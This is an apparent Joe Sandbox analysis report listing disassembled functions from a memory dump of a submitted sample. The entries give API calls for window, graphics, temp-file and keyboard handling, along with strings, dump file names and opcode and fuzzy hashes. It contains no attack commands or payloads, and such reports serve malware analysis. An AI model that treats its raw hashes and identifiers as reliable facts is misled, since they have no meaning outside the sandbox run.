Instruction Fuzzy Hash: 4A514871A00649DFDB21DFA9CC85BADBBF5BF48300F204169E556EB291EB709941CF80

Function 001F851D Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 001F8527
CloseHandle.KERNEL32(kQ),00000080,0029516B,?,00000000,?,00000000), ref: 001F8560
GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,00000080,0029516B,?,00000000,?,00000000), ref: 001F8587
GetTempFileNameW.KERNEL32(000000FF,AFX,00000000,00000000,00000104,00000000,000000FF,?,00000000), ref: 001F85BE
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000000), ref: 001F85E0

Strings

kQ), xrefs: 001F8541, 001F855D, 001F8544
AFX, xrefs: 001F85B6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FileTemp$CloseCreateH_prolog3_catchHandleNamePath
String ID: AFX$kQ)
API String ID: 1737446630-615654425
Opcode ID: 356438b99f3050bedf349fa3d6f8ebc930e34122a4ad47c9d9aaaf7041bee007
Instruction ID: ae866e22125210e417caa9fcb82e0f4ebd7a672872f152fabaeef718dad5e69c
Opcode Fuzzy Hash: 356438b99f3050bedf349fa3d6f8ebc930e34122a4ad47c9d9aaaf7041bee007
Instruction Fuzzy Hash: F0418B70800149AFCB00EBA4CD95EEEBBB8AF64314F10425DB556A72E1DF309A05CB61

Function 001D4D60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001D4CAE: GetParent.USER32(?), ref: 001D4D02
Part of subcall function 001D4CAE: GetLastActivePopup.USER32(?), ref: 001D4D13
Part of subcall function 001D4CAE: IsWindowEnabled.USER32(?), ref: 001D4D27
Part of subcall function 001D4CAE: EnableWindow.USER32(?,00000000), ref: 001D4D3A

EnableWindow.USER32(?,00000001), ref: 001D4DAD
GetWindowThreadProcessId.USER32(?,?), ref: 001D4DC1
GetCurrentProcessId.KERNEL32(?,?), ref: 001D4DCB
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 001D4DE3
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 001D4E5F
EnableWindow.USER32(00000000,00000001), ref: 001D4EA6

Strings

0, xrefs: 001D4E38

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 8fe2dbc6209fa99df747a29acfb0661ebbb8687ff488fd8f9345dda4ad8477d5
Instruction ID: 365381288d022e3a99ec2d5fb5f41f20f640e962323f6193fe897476039dd060
Opcode Fuzzy Hash: 8fe2dbc6209fa99df747a29acfb0661ebbb8687ff488fd8f9345dda4ad8477d5
Instruction Fuzzy Hash: A9419272A40258ABCB319F64DC897EAB7B9FF14710F24059AF519D6290DB70DE808F90

Function 0024EBDB Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0024EBE2

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

_wcslen.LIBCMT ref: 0024EC5E
_wcslen.LIBCMT ref: 0024EC97
_wcslen.LIBCMT ref: 0024ECB3
_wcslen.LIBCMT ref: 0024ECCF

Strings

4)1, xrefs: 0024EC83
SOFTWARE\, xrefs: 0024EC58, 0024EC5D, 0024EC65

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$H_prolog3$Exception@8Throw
String ID: 4)1$SOFTWARE\
API String ID: 1893837447-3232284854
Opcode ID: 30172449505c7015a29a4e67aa50d4c50da5abcddf05ce841b5ac1b4f9c1b9dd
Instruction ID: c84a7397e5b7ec66bfc28a38c98a403127dc7b14b1bc3784027b6b1fc2e10ea6
Opcode Fuzzy Hash: 30172449505c7015a29a4e67aa50d4c50da5abcddf05ce841b5ac1b4f9c1b9dd
Instruction Fuzzy Hash: A2313E719210569BDF08BFA4CC92EFE7369FF30314715442DB416AB1A2DB30AE94CB51

Function 001C67F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001C681D
std::_Lockit::_Lockit.LIBCPMT ref: 001C6840
std::bad_exception::bad_exception.LIBCMT ref: 001C68C4
__CxxThrowException@8.LIBCMT ref: 001C68D2
std::_Lockit::_Lockit.LIBCPMT ref: 001C68E5

Strings

t!1, xrefs: 001C6804
bad cast, xrefs: 001C68BC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast$t!1
API String ID: 2513498551-666071036
Opcode ID: b39fe94c2c19c2454bdff333c2082052a2a804449e2b4738b369e9d4f9f8d577
Instruction ID: a97781710004807aaaaa2385ce7b0f73853774014adde1fe1cac605bf6b70590
Opcode Fuzzy Hash: b39fe94c2c19c2454bdff333c2082052a2a804449e2b4738b369e9d4f9f8d577
Instruction Fuzzy Hash: 7431BD71910205DFCB25DF54D892FAEB7B8EB24324F50466EE826A7291DB70ED40CF91

Function 0023566E Relevance: 12.2, APIs: 8, Instructions: 240windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023283C: GdipGetImagePixelFormat.GDIPLUS(?,00336BF4,00000000,00000000,?,00235698,00000000,00000000,00336BF4), ref: 0023284C

_free.LIBCMT ref: 002357A1
_free.LIBCMT ref: 002357ED
GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00336BF4), ref: 002358B6
_free.LIBCMT ref: 002358E6

Part of subcall function 0023285E: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00235752,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00232872

GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00336BF4), ref: 00235962
_free.LIBCMT ref: 002359DD

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
String ID:
API String ID: 4092590016-0
Opcode ID: 00d09881e0a0fb363fc22c3d15947d362abffd36919684e310a13cea0cd52205
Instruction ID: 58de24e806090ccfac63a082af211a524ebef1aed3d84dd7dd89e3cd730e1476
Opcode Fuzzy Hash: 00d09881e0a0fb363fc22c3d15947d362abffd36919684e310a13cea0cd52205
Instruction Fuzzy Hash: 25A17DF1920629DBCB319F14CD80BA9B7B4AF44310F1084E9EA4DA7241CB749EE5CF98

Function 002136C8 Relevance: 12.2, APIs: 8, Instructions: 239windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002136F7
IsWindowVisible.USER32(?), ref: 00213706
GetWindowRect.USER32(?,?), ref: 00213758
IsZoomed.USER32(?), ref: 00213767
SetWindowRgn.USER32(?,00000000,00000001), ref: 002137D4
_memset.LIBCMT ref: 002137F4
GetSystemMetrics.USER32(00000004), ref: 0021383E
_memset.LIBCMT ref: 0021390F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Visible_memset$MetricsRectSystemZoomed
String ID:
API String ID: 3274878110-0
Opcode ID: 14179e27d335082aa5576e1681d7b9b2ad6fe4a2e5945c7552b143d5cc9d4090
Instruction ID: fbddc6613399b5b83f00af215a92507016b65aea2e3a9d179f3ff286c29b7e7c
Opcode Fuzzy Hash: 14179e27d335082aa5576e1681d7b9b2ad6fe4a2e5945c7552b143d5cc9d4090
Instruction Fuzzy Hash: 52915AB1E1021A9FCF10DFA9C884AEEBBB6FF58700F14416AF805AB255D7709941CFA1

Function 00234BEB Relevance: 12.2, APIs: 8, Instructions: 204windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00234BF2
EnterCriticalSection.KERNEL32(00336BF4,00000014,001F809A,?,?,00000000,00000000,00000000,00000000), ref: 00234C17
SelectObject.GDI32(?,00000014), ref: 00234D06
LeaveCriticalSection.KERNEL32(00336BF4,?,00000014,001F809A,?,?,00000000,00000000,00000000,00000000), ref: 00234D25
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00234D48
SelectObject.GDI32(00000000), ref: 00234D57
CreateCompatibleDC.GDI32(00000000), ref: 00234DE1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00234E01

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 4255533662-0
Opcode ID: cfb20ef07fe994c8f859cd87e141dafecdff72b14909cc685e1fd09e4fa712b1
Instruction ID: 2f7031a84bc41d71e79815697f26191f0926895a4056a4fbe48611c938965554
Opcode Fuzzy Hash: cfb20ef07fe994c8f859cd87e141dafecdff72b14909cc685e1fd09e4fa712b1
Instruction Fuzzy Hash: 4D718EB0621B02DFCB21EF65C881A6AB7E5FB94304F249D6AE096C6650D771F8A0CF10

Function 0021F93F Relevance: 12.2, APIs: 8, Instructions: 183windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0021F946
GetSystemMenu.USER32(?,00000000,00000038,001E308E,00000000,00000000,?), ref: 0021F9F4
IsMenu.USER32(?), ref: 0021FA09
IsMenu.USER32(?), ref: 0021FA1A
GetWindowLongW.USER32(?,000000F0), ref: 0021FA42
_memset.LIBCMT ref: 0021FB24
GetMenuItemInfoW.USER32(00000000,0000F060,00000000,?), ref: 0021FB3F
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0021FB94

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Window$H_prolog3InfoItemLongRedrawSystem_memset
String ID:
API String ID: 428562733-0
Opcode ID: 319451ceb6f940f69e4a0fcdf3016d9737a68367d09d862e28836da93229a099
Instruction ID: f43ce82f57456b1c0517ea55d9aa5020c9f23ef7d9971046452adeab39a12632
Opcode Fuzzy Hash: 319451ceb6f940f69e4a0fcdf3016d9737a68367d09d862e28836da93229a099
Instruction Fuzzy Hash: 9571C071910306AFDB51DF60CA84BEEB7F8FF54310F20452DE86A96291DB749A91CF50

Function 002A03A0 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002A03A7
EqualRect.USER32(?,?), ref: 002A03C6
EqualRect.USER32(?,?), ref: 002A03D7
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 002A0427
CreateRectRgn.GDI32(?,00000000,?,?), ref: 002A045A
CreateRectRgnIndirect.GDI32(?), ref: 002A0466
SetWindowRgn.USER32(?,?,00000000), ref: 002A048D
RedrawWindow.USER32(?,00000000,00000000,00000105,00334F98,?,?,?,00000001,00000058), ref: 002A0505

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$EqualWindow$H_prolog3IndirectRedraw
String ID:
API String ID: 1234839666-0
Opcode ID: 4259934b7c604da242bd81c42dafc6ac95b3f6b70637e9667d8b37542916e9ea
Instruction ID: b870309d5c3c987a2159891c8d5bfd0bfe85ce91408b76ff979dc6b47dae8095
Opcode Fuzzy Hash: 4259934b7c604da242bd81c42dafc6ac95b3f6b70637e9667d8b37542916e9ea
Instruction Fuzzy Hash: C051277151010AAFCF01DFA8C899EEF7BB9BF09300F014129B909AB255DB70AA55CFA0

Function 001D96D3 Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001D9716
BeginDeferWindowPos.USER32(00000008), ref: 001D972E
GetTopWindow.USER32(?), ref: 001D9743
GetDlgCtrlID.USER32(00000000), ref: 001D9752
SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 001D9784
GetWindow.USER32(00000000,00000002), ref: 001D978D
CopyRect.USER32(?,?), ref: 001D97AB
EndDeferWindowPos.USER32(00000000), ref: 001D9822

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 6b9bdba41056b57647d6bf61647308f4610b019a0a53a60c0de640e4443bd175
Instruction ID: 71009aef48e43ec616e87bbe28197f9b2a4298597843be51bc579bc5a18c5917
Opcode Fuzzy Hash: 6b9bdba41056b57647d6bf61647308f4610b019a0a53a60c0de640e4443bd175
Instruction Fuzzy Hash: 36511372910219DFCF15DFA8D8889EEB7B9FF49310F14816AE805BB250DB359940CFA4

Function 001E8497 Relevance: 12.1, APIs: 8, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 0023CB2E: ReleaseCapture.USER32 ref: 0023CB5C
Part of subcall function 0023CB2E: IsWindow.USER32(?), ref: 0023CB80
Part of subcall function 0023CB2E: DestroyWindow.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 0023CB90

SetRectEmpty.USER32(?), ref: 001E84CA
ReleaseCapture.USER32 ref: 001E84D0
SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E84DF
GetCapture.USER32 ref: 001E8521
ReleaseCapture.USER32 ref: 001E8531
SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E8540
RedrawWindow.USER32(?,?,?,00000505), ref: 001E85AB
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 001E85EA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
String ID:
API String ID: 2209428161-0
Opcode ID: 8a3b0252272e925d49f41cf90df3083901ad7f64c24865601e64b736e19bd9f0
Instruction ID: 55dbcfaaaaa1cbc2d24e1f4348ad05f183807f453febd5f1afedc35cff32281c
Opcode Fuzzy Hash: 8a3b0252272e925d49f41cf90df3083901ad7f64c24865601e64b736e19bd9f0
Instruction Fuzzy Hash: D4416C71200A409FD725AB35D84DF5F7BA9BF94325F250A1DE5AECB2A0DF30E8008B50

Function 00253BA4 Relevance: 12.1, APIs: 8, Instructions: 100COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00253BC1
GetParent.USER32(?), ref: 00253BD8
GetClientRect.USER32(?,?), ref: 00253C66
MapWindowPoints.USER32(?,?,?,00000002), ref: 00253C79
PtInRect.USER32(?,?,?), ref: 00253C89

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientRect$ParentPointsScreenWindow
String ID:
API String ID: 1402249346-0
Opcode ID: 20ee193d50c0ee213fce0e83c2c3e00cd4c2f8b4d4b3228593ccddbb2a04e21a
Instruction ID: 36104e3326b6fbed9456be8ee0e873e7b39356ee75bbfb99798c922569d82406
Opcode Fuzzy Hash: 20ee193d50c0ee213fce0e83c2c3e00cd4c2f8b4d4b3228593ccddbb2a04e21a
Instruction Fuzzy Hash: 7F317272610209AFCB01DFA5DC889BEBBB9FF48341B210515F946E7160DB70DE14DB54

Function 001C9B90 Relevance: 12.1, APIs: 8, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 001C9B9A
GlobalDeleteAtom.KERNEL32(?), ref: 001C9C45
GlobalDeleteAtom.KERNEL32(?), ref: 001C9C58
_free.LIBCMT ref: 001C9C8A
_free.LIBCMT ref: 001C9C92
_free.LIBCMT ref: 001C9C9A
_free.LIBCMT ref: 001C9CA2
_free.LIBCMT ref: 001C9CAA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _free$AtomDeleteGlobal$H_prolog3_catch_
String ID:
API String ID: 1844215989-0
Opcode ID: 9b471ac83a3fe352a2085a6bfbb4d2c65c1a24087c23f95275290b0b9d966c03
Instruction ID: 56afab8347e427f920fce6999cdd51b5811919e2efea45b0a27e125fb172716f
Opcode Fuzzy Hash: 9b471ac83a3fe352a2085a6bfbb4d2c65c1a24087c23f95275290b0b9d966c03
Instruction Fuzzy Hash: 3A3180706002409FCB24AF64C9D9FADBBE6BF14700F54886DF14A8B662CB71DD80CB15

Function 001F7688 Relevance: 12.1, APIs: 8, Instructions: 75keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000012), ref: 001F76B8
GetAsyncKeyState.USER32(00000012), ref: 001F76D2
_memset.LIBCMT ref: 001F76F1
GetKeyboardState.USER32(?), ref: 001F7700
GetKeyboardLayout.USER32(?), ref: 001F7717
MapVirtualKeyW.USER32(?,00000000), ref: 001F7733
ToUnicodeEx.USER32(?,00000000), ref: 001F773B
CharUpperW.USER32(?), ref: 001F7748

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: State$AsyncKeyboard$CharLayoutUnicodeUpperVirtual_memset
String ID:
API String ID: 3224171628-0
Opcode ID: 64f853e5cdbd48df68d9df54b1c2b40db4d5987dc709f241c0db509be15127ff
